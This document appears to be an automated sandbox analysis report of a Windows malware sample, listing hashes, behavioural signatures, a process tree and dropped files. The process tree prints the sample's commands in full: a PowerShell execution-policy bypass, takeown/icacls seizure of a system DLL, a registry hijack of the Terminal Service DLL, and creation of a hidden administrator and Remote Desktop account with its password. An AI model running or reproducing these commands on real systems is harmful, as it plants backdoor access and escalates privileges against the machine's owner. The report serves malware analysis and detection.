Analysis
- max time kernel: 124s
- max time network: 145s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 20-05-2022 06:21
Static task: static1
Behavioral task: behavioral1
  Sample: e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe
  Resource: win10v2004-20220414-en
General
- Target: e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe
- Size: 2.4MB
- MD5: c9d8d20830f3b513e9c07c6f7d3b9270
- SHA1: ef53837929f88ecc9aeb2d16bed2940eb8175d03
- SHA256: e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f
- SHA512: d8cf1ac44e1df0ff3bae6edfa2f59172576f02303709f4508de83916158c835599209942d5c8b3f4bbf32f5d872844ce1253c19cc4c8a4e565d32074c971123c
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Possible privilege escalation attempt 8 IoCs
Processes (pid, process):
2840 takeown.exe
780 icacls.exe
3524 icacls.exe
2576 icacls.exe
2544 icacls.exe
944 icacls.exe
4892 icacls.exe
252 icacls.exe
-
Sets DLL path for service in the registry 2 TTPs
-
Resources (resource, yara_rule):
C:\Windows\Help\servicedll.dll upx
C:\Windows\Help\lababa.bin upx
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description, ioc, process):
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation wscript.exe
-
Loads dropped DLL 3 IoCs
Processes (pid, process):
4024 e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe
5052 5052
-
Modifies file permissions 1 TTPs 8 IoCs
Processes (pid, process):
780 icacls.exe
3524 icacls.exe
2576 icacls.exe
2544 icacls.exe
944 icacls.exe
4892 icacls.exe
252 icacls.exe
2840 takeown.exe
-
Drops file in System32 directory 1 IoCs
Processes (description, ioc, process):
File created C:\Windows\system32\rfxvmt.dll powershell.exe
-
Drops file in Windows directory 3 IoCs
Processes (description, ioc, process):
File created C:\Windows\help\servicedll.dll powershell.exe
File created C:\Windows\help\lababa.bin powershell.exe
File created C:\Windows\help\portable.dat powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes (pid, process):
3068 powershell.exe
3068 powershell.exe
3068 powershell.exe
3068 powershell.exe
3068 powershell.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes (pid, process):
684 684
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes (description, pid, process):
Token: SeDebugPrivilege 3068 powershell.exe
Token: SeRestorePrivilege 3524 icacls.exe
-
Suspicious use of WriteProcessMemory 52 IoCs
Processes (description, pid, process, target process):
PID 4024 wrote to memory of 3976 | e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe -> cmd.exe
PID 4024 wrote to memory of 3976 | e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe -> cmd.exe
PID 3976 wrote to memory of 1404 | cmd.exe -> wscript.exe
PID 3976 wrote to memory of 1404 | cmd.exe -> wscript.exe
PID 1404 wrote to memory of 4628 | wscript.exe -> cmd.exe
PID 1404 wrote to memory of 4628 | wscript.exe -> cmd.exe
PID 4628 wrote to memory of 3068 | cmd.exe -> powershell.exe
PID 4628 wrote to memory of 3068 | cmd.exe -> powershell.exe
PID 3068 wrote to memory of 2840 | powershell.exe -> takeown.exe
PID 3068 wrote to memory of 2840 | powershell.exe -> takeown.exe
PID 3068 wrote to memory of 780 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 780 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 3524 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 3524 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 2576 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 2576 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 2544 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 2544 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 944 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 944 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 4892 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 4892 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 252 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 252 | powershell.exe -> icacls.exe
PID 3068 wrote to memory of 232 | powershell.exe -> reg.exe
PID 3068 wrote to memory of 232 | powershell.exe -> reg.exe
PID 3068 wrote to memory of 1468 | powershell.exe -> net.exe
PID 3068 wrote to memory of 1468 | powershell.exe -> net.exe
PID 1468 wrote to memory of 3216 | net.exe -> net1.exe
PID 1468 wrote to memory of 3216 | net.exe -> net1.exe
PID 1712 wrote to memory of 3752 | cmd.exe -> net.exe
PID 1712 wrote to memory of 3752 | cmd.exe -> net.exe
PID 3752 wrote to memory of 5044 | net.exe -> net1.exe
PID 3752 wrote to memory of 5044 | net.exe -> net1.exe
PID 3068 wrote to memory of 4668 | powershell.exe -> cmd.exe
PID 3068 wrote to memory of 4668 | powershell.exe -> cmd.exe
PID 4636 wrote to memory of 3692 | cmd.exe -> net.exe
PID 4636 wrote to memory of 3692 | cmd.exe -> net.exe
PID 3692 wrote to memory of 4976 | net.exe -> net1.exe
PID 3692 wrote to memory of 4976 | net.exe -> net1.exe
PID 3628 wrote to memory of 4216 | cmd.exe -> net.exe
PID 3628 wrote to memory of 4216 | cmd.exe -> net.exe
PID 4216 wrote to memory of 2708 | net.exe -> net1.exe
PID 4216 wrote to memory of 2708 | net.exe -> net1.exe
PID 4084 wrote to memory of 5016 | cmd.exe -> net.exe
PID 4084 wrote to memory of 5016 | cmd.exe -> net.exe
PID 5016 wrote to memory of 2136 | net.exe -> net1.exe
PID 5016 wrote to memory of 2136 | net.exe -> net1.exe
PID 464 wrote to memory of 2640 | cmd.exe -> net.exe
PID 464 wrote to memory of 2640 | cmd.exe -> net.exe
PID 2640 wrote to memory of 540 | net.exe -> net1.exe
PID 2640 wrote to memory of 540 | net.exe -> net1.exe
Processes
-
Image: C:\Users\Admin\AppData\Local\Temp\e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe
Command: "C:\Users\Admin\AppData\Local\Temp\e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe"
Depth: 1
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\SYSTEM32\cmd.exe
Command: "cmd.exe" /c wscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs
Depth: 2
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\wscript.exe
Command: wscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs
Depth: 3
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\System32\cmd.exe
Command: "C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\reactor.txt reactor.ps1& powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps1
Depth: 4
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command: powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps1
Depth: 5
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\takeown.exe
Command: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
Depth: 6
- Possible privilege escalation attempt
- Modifies file permissions
-
Image: C:\Windows\system32\icacls.exe
Command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
Depth: 6
- Possible privilege escalation attempt
- Modifies file permissions
-
Image: C:\Windows\system32\icacls.exe
Command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
Depth: 6
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
Image: C:\Windows\system32\icacls.exe
Command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
Depth: 6
- Possible privilege escalation attempt
- Modifies file permissions
-
Image: C:\Windows\system32\icacls.exe
Command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
Depth: 6
- Possible privilege escalation attempt
- Modifies file permissions
-
Image: C:\Windows\system32\icacls.exe
Command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
Depth: 6
- Possible privilege escalation attempt
- Modifies file permissions
-
Image: C:\Windows\system32\icacls.exe
Command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
Depth: 6
- Possible privilege escalation attempt
- Modifies file permissions
-
Image: C:\Windows\system32\icacls.exe
Command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
Depth: 6
- Possible privilege escalation attempt
- Modifies file permissions
-
Image: C:\Windows\system32\reg.exe
Command: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\servicedll.dll /f
Depth: 6
- Modifies registry key
-
Image: C:\Windows\system32\net.exe
Command: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
Depth: 6
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net1.exe
Command: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
Depth: 7
-
Image: C:\Windows\system32\cmd.exe
Command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
Depth: 6
-
Image: C:\Windows\System32\cmd.exe
Command: cmd /C net.exe user WgaUtilAcc VHV7xNE9 /add
Depth: 1
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net.exe
Command: net.exe user WgaUtilAcc VHV7xNE9 /add
Depth: 2
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net1.exe
Command: C:\Windows\system32\net1 user WgaUtilAcc VHV7xNE9 /add
Depth: 3
-
Image: C:\Windows\System32\cmd.exe
Command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
Depth: 1
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net.exe
Command: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
Depth: 2
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net1.exe
Command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
Depth: 3
-
Image: C:\Windows\System32\cmd.exe
Command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
Depth: 1
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net.exe
Command: net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
Depth: 2
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net1.exe
Command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
Depth: 3
-
Image: C:\Windows\System32\cmd.exe
Command: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
Depth: 1
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net.exe
Command: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
Depth: 2
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net1.exe
Command: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
Depth: 3
-
Image: C:\Windows\System32\cmd.exe
Command: cmd /C net.exe user WgaUtilAcc VHV7xNE9
Depth: 1
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net.exe
Command: net.exe user WgaUtilAcc VHV7xNE9
Depth: 2
- Suspicious use of WriteProcessMemory
-
Image: C:\Windows\system32\net1.exe
Command: C:\Windows\system32\net1 user WgaUtilAcc VHV7xNE9
Depth: 3
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\9887742.txt
Filesize: 149KB
MD5: f63cb26ded5c82a6c82e5160933da4ed
SHA1: 9ae96ecea3c6c56a6e67e672cf9422d7427c04ff
SHA256: 7788a48c713d87538bedf7907733b03eb72d3682004b4d1795d0e6eb1b494f4c
SHA512: 985cbe9af1b9539eb5b67eef4b78bd7581247f3a4b7e4c3ecd6ced3694d9c56814dfd9a866797aa3edeebe68dc07f35513fd62b804d5a0c5699288c9b37adbab
-
C:\Users\Admin\AppData\Local\Temp\changelog_66663.txt
Filesize: 284KB
MD5: a97cf439052cb972928acb8d809f9edc
SHA1: 2bb935b6b2cf883315eacf3efec2b94bc1054961
SHA256: 9fed878f994d4778d1ee922ee0c7478cadfb16a119aa93e4e3e8fa555e9d4547
SHA512: e861d95e20fd989080349e2257604fde204fda4090fac9d0f2fc413efc7731855a66b0342b902e373908fccb9f85f6777bcf1530d585d6e5bdfdd64e1809c907
-
C:\Users\Admin\AppData\Local\Temp\changes_765543.txt
Filesize: 102B
MD5: 2262b6007676e3cbf03ea58815e85ca6
SHA1: 3b4ea6d234879e6829d859dc681ca6f27878706c
SHA256: 7b362e61c8e00a05a2949bb47da3f9f5c31c7c8dfda160e474f2a3e5d9058d32
SHA512: 4ec2963ee3754d7159938719f52496ec9ec05ffe7c11957747a312bda99c3cfd016eb3f0d36c940d1d5720dc5b3f3e8cd5d0d7eea28d84a9b4227efb22561e9d
-
C:\Users\Admin\AppData\Local\Temp\install_455111.log
Filesize: 62KB
MD5: 0c34e2096fc530535d1fb38b8e9f68a6
SHA1: ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a
SHA256: fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb
SHA512: 0b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf
-
C:\Users\Admin\AppData\Local\Temp\log_455111.txt
Filesize: 36KB
MD5: 2c50ffba8c7d98a9cb5fec3c2a6913df
SHA1: 849b62f4911551b69cab9bc5ca6cf1af7ca28fc0
SHA256: f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0
SHA512: 7d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750
-
C:\Users\Admin\AppData\Local\Temp\nsd77B7.tmp\System.dll
Filesize: 11KB
MD5: fbe295e5a1acfbd0a6271898f885fe6a
SHA1: d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256: a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512: 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
C:\Users\Admin\AppData\Local\Temp\reactor.txt
Filesize: 4KB
MD5: c2a9670c6617c3acc5cc5099b1437e42
SHA1: 6a83468dcaf55f74cd46fdf280ed8f354e6d93eb
SHA256: c5b725434a92709e3bf65d44b5cb25712a2140141facb54396e25b29933c7b95
SHA512: d2c789f800cae8420b36380155a5d1566b7bed9f2a609b739dee4d20064e7770efd48303000f0ee6aa79340d73b7557223af885ffc78aa32a7c372d04e2903a1
-
C:\Users\Admin\AppData\Local\Temp\reactor.vbs
Filesize: 139B
MD5: c0a65d8cb9b5db7fdc9a178f8c80102d
SHA1: 733f50a72526784a61aaf77e5cddf13f904c1693
SHA256: a55d04242cc9381741621d2918accce8fb9c4b8307013c9f828cacdd1d4895c2
SHA512: 36dc712d8a926c6a7bc4257345261ea0b7154daa97735123007e903cdb732ebf2fe0c3358f00b6b500cdccceecbc130cbc3f4a2a2a4f09974bcca8dc93ed4539
-
C:\Users\Admin\AppData\Local\Temp\readme_455111.txt
Filesize: 2.4MB
MD5: c427e13edac52d92b85088800da0f68c
SHA1: 231c0cd0ad5e9734d8c2d4504a1025be24bebf0d
SHA256: 7c47428cdc44a7df3a3ced60872f4c9640d4a8daca5054f5ba8983fc433ab36b
SHA512: 4b947f365cf55307e92d3ed3ff2cbeda9d5b7ea6a1562d30cdf460161d16105d7c7949257376d726c15a9cf3543d0f95a868baf309ebf80800f4429bf2a4f943
-
C:\Windows\Help\lababa.bin
Filesize: 937KB
MD5: c59afead2b5626d312fedea8f9eb0c4a
SHA1: c22f14f59a5851d6a365cf6dd590e74fe6e34363
SHA256: ad7dc6c18fa2c9078229e167a09319b53c3d331ff272c258a27528c1bf4810b0
SHA512: 4313acb308184db8e7e338ba56de202a4c71a6984abdae8ecbd091e6c2f055f6dafef00fbf52031713f3d1d8518287fa0a6137d82dc64db7671906db1c90b9c8
-
C:\Windows\Help\servicedll.dll
Filesize: 58KB
MD5: def5e867485841d1f2f53db3f0407514
SHA1: 1fdfa582b37f4c0c06a998532856a89581a5fea0
SHA256: 25de2f4ca48b55ba403b08d94d64e97b5582fa76b51b9ac8e7bcaae111e04dfc
SHA512: c470af48a66507dacf5129f0ae7d68df859443e2cb709a507fe6b23be1ff52ca9ded878adcb60997544e9227022d7dbc8bd91b89fa33a30eef8effb1d6dbaf43
-
C:\Windows\system32\rfxvmt.dll
Filesize: 40KB
MD5: dc39d23e4c0e681fad7a3e1342a2843c
SHA1: 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256: 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512: 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
memory/232-152-0x0000000000000000-mapping.dmp
-
memory/252-151-0x0000000000000000-mapping.dmp
-
memory/540-169-0x0000000000000000-mapping.dmp
-
memory/780-145-0x0000000000000000-mapping.dmp
-
memory/944-149-0x0000000000000000-mapping.dmp
-
memory/1404-132-0x0000000000000000-mapping.dmp
-
memory/1468-153-0x0000000000000000-mapping.dmp
-
memory/2136-167-0x0000000000000000-mapping.dmp
-
memory/2544-148-0x0000000000000000-mapping.dmp
-
memory/2576-147-0x0000000000000000-mapping.dmp
-
memory/2640-168-0x0000000000000000-mapping.dmp
-
memory/2708-165-0x0000000000000000-mapping.dmp
-
memory/2840-143-0x0000000000000000-mapping.dmp
-
memory/3068-136-0x0000000000000000-mapping.dmp
-
memory/3068-138-0x00007FFAE0AF0000-0x00007FFAE15B1000-memory.dmp
Filesize: 10.8MB
-
memory/3068-137-0x00000203B5AB0000-0x00000203B5AD2000-memory.dmp
Filesize: 136KB
-
memory/3216-154-0x0000000000000000-mapping.dmp
-
memory/3524-146-0x0000000000000000-mapping.dmp
-
memory/3692-162-0x0000000000000000-mapping.dmp
-
memory/3752-159-0x0000000000000000-mapping.dmp
-
memory/3976-131-0x0000000000000000-mapping.dmp
-
memory/4216-164-0x0000000000000000-mapping.dmp
-
memory/4628-134-0x0000000000000000-mapping.dmp
-
memory/4668-161-0x0000000000000000-mapping.dmp
-
memory/4892-150-0x0000000000000000-mapping.dmp
-
memory/4976-163-0x0000000000000000-mapping.dmp
-
memory/5016-166-0x0000000000000000-mapping.dmp
-
memory/5044-160-0x0000000000000000-mapping.dmp